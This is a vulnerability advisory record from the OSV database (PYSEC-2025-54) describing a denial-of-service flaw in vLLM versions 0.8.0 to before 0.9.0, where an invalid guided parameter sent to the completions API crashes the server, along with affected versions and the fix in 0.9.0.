PYSEC-2025-54

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/vllm/PYSEC-2025-54.yaml
JSON Data
https://api.test.osv.dev/v1/vulns/PYSEC-2025-54
Aliases
Published
2025-05-30T19:15:30Z
Modified
2025-06-26T21:43:40.452295Z
Summary
[none]
Details

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

References

Affected packages

PyPI / vllm

Package

Affected ranges

Type
GIT
Repo
https://github.com/vllm-project/vllm
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
Type
ECOSYSTEM
Events
Introduced
0.8.0
Fixed
0.9.0

Affected versions

0.*

0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1